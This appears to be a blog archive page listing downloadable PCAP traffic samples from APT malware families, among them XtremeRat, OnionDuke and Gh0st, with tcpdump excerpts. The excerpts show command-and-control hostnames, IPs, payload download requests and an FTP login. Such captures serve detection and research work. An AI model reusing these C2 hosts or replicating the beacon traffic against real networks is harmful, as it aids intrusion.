Category Archives: APT Samples

XtremeRat APT Implant Remote Access Trojan Traffic Sample Download PCAP

Download full PCAP traffic sample : xtremerat.pcap
1970-01-01 -4:-59:-3.627690 IP 10.0.2.15.1050 > 189.75.20.224.81: Flags [P.], seq 1:298, ack 1, win 64240, length 297
E..Q.|@….. ….K…..Q…..L,.P…….GET /1234567890.functions HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: pokemom2015.no-ip.org:81
Connection: Keep-Alive
Cache-Control:…

APT TrojanCookies Malware Traffic Sample Trojan PCAP Download

Download TrojanCookies APT PCAP Sample : trojancookies.pcap
2013-01-05 22:41:53.771374 IP 172.16.253.130.1092 > 117.55.241.58.80: Flags [P.], seq 1:280, ack 1, win 64240, length 279: HTTP: GET /indexs.zip HTTP/1.1
E..?.a@….R….u7.:.D.P…\..A P…S…GET /indexs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR…

OnionDuke APT Malware Traffic Sample PCAP Download

Download OnionDuke APT Malware : onionduke
1970-01-01 -4:-58:-32.468345 IP 10.0.2.15.1025 > 10.0.2.2.53: 56315+ A? rombeast.site50.net. (37)
E..A.q….”+ … ……5.-……………rombeast.site50.net…..
1970-01-01 -4:-58:-32.492920 IP 10.0.2.2.53 > 10.0.2.15.1025: 56315 1/2/0 A 31.170.162.243 (103)
E…./..@.b+ … ….5…o\…………..rombeast.site50.net…………..X…………..Q….ns2 000webhost.com………Q….ns1.E
1970-01-01 -4:-58:-32.496438 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [S], seq 3752956870, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.r@…+. ……….P……..p…A………..
1970-01-01…

Vintage Gh0st APT FTP Malware Traffic Sample Download PCAP

Download the raw PCAP for Gh0st APT here : Gh0st.pcap
2012-08-05 22:50:40.647899 IP 192.168.106.141.1068 > 121.63.150.15.21: Flags [R.], seq 266, ack 1, win 0, length 0
E..(.W@…….j.y?…,…..F.J.8P…….
2012-08-05 22:50:40.648984 IP 192.168.106.141.1032 > 192.168.106.2.53: 10854+ A? netuser.dns1.us. (33)
E..=.X…..w..j…j….5.)..*f………..netuser.dns1.us…..
2012-08-05 22:50:40.698458 IP 192.168.106.2.53 > 192.168.106.141.1032: 10854 1/0/0 A 27.22.117.26 (49)
E..M……K)..j…j..5…9N.*f………..netuser.dns1.us……………….u.
2012-08-05 22:50:40.698958 IP 192.168.106.141.1069 >…

APT – Advanced Persistent Threat / MALWARE – Reedum – Historical Traffic Sample

1970-01-01 -4:-59:-35.7292 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 1:17, ack 62, win 64179, length 16
E..8.X@….p …m…….X{.a…?P…l…USER user37704
1970-01-01 -4:-59:-35.7292 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 17, win 65535, length 0
E..(….@.`.m… ……….?X{.qP…|…
1970-01-01 -4:-59:-35.7866 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 62:141, ack 17, win 65535, length 79
E..w….@.`rm… ……….?X{.qP…kZ..331 …………………
